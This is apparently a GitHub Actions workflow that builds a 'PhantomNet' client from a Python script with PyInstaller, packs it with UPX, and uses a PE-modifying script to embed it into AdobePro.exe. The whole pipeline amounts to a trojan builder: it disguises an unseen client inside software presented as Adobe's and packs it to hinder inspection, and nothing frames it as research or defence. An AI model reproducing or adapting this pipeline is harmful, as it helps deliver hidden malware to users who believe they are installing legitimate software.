name: Build and Embed PhantomNet Client

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.9'

    - name: Install Python dependencies
      run: |
        pip install pyinstaller pefile

    - name: Install UPX
      run: |
        Invoke-WebRequest -Uri "https://github.com/upx/upx/releases/download/v4.0.2/upx-4.0.2-win64.zip" -OutFile "upx.zip"
        Expand-Archive -Path "upx.zip" -DestinationPath "."

    - name: Convert phantomnet-client.py to executable
      run: |
        pyinstaller --onefile phantomnet-client.py --distpath output

    - name: Pack the executable with UPX
      run: |
        .\upx-4.0.2-win64\upx.exe --force output\phantomnet-client.exe

    - name: Embed and modify AdobePro.exe
      run: |
        python modify_pe.py AdobePro.exe output\phantomnet-client.exe
